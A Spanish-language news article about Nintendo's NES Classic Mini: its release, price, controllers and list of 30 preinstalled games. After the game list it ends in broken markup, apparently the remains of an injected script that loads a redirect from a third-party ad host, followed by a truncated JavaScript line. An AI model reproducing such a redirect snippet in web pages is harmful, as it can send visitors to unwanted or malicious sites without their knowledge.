Nintendo anuncia el lanzamiento de NES en miniatura para este año.

Nintendo decide volver al pasado con la consola NES (Nintendo Entertainment System).

Nintendo lanzará en noviembre de este año la consola de edición especial NES que ahora será en miniatura y traerá  30 juegos clásicos para todo el público y los amantes de los videojuegos. La pequeña consola tendrá el nombre de “Nintendo Classic Mini”, será compatible con los nuevos televisores para que la gente no tenga problemas en usarla, contará con dos entradas para controles para jugar localmente con algún amigo y es importante mencionar que la “Nes Classic Mini” cabe en la palma de la mano.

Sin duda, ¿quién no recuerda esta consola?, fue una plataforma épica para la historia de los videojuegos en el año de 1985 con su avanzado interfaz de 8 bits. Hasta la fecha NES ha estado presente en muchos hogares alrededor del mundo, aunque los niños de estos tiempos tengan las nuevas plataformas, saben de la existencia de NES y su importancia para los juegos de hoy en día como Mario, Kirby, Zelda, entre otros.

La pequeña plataforma incluirá un control de edición especial para jugar y tendrá la opción de compatibilidad con un mando de Wii Classic Controller o Classic Controller Pro. Cada control extra tendrá un precio de $10 dólares, la consola completa tendrá un costo estimado de $60 dólares.

Sabemos que tendrá la opción de jugar 30 juegos clásicos que sin duda son experiencias épicas para cada jugador. Los juegos son:

Los 30 jugos preinstalados son los siguientes

Balloon Fight
BUBBLE BOBBLE
Castlevania
Castlevania II: Simon’s Quest
Donkey Kong
Donkey Kong Jr.
DOUBLE DRAGON II: THE REVENGE
Dr. Mario
Excitebike
FINAL FANTASY
Galaga
GHOSTS‘N GOBLINS
GRADIUS
Ice Climber
Kid Icarus
Kirby’s Adventure
Mario Bros.
MEGA MAN 2
Metroid
NINJA GAIDEN
PAC-MAN
Punch-Out!! Featuring Mr. Dream
StarTropics
SUPER C
Super Mario Bros.
Super Mario Bros. 2
Super Mario Bros. 3
Tecmo Bowl
The Legend of Zelda
Zelda II: The Adventure of Link

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

var d=document;var s=d.createElement(”);

Etiquetas:|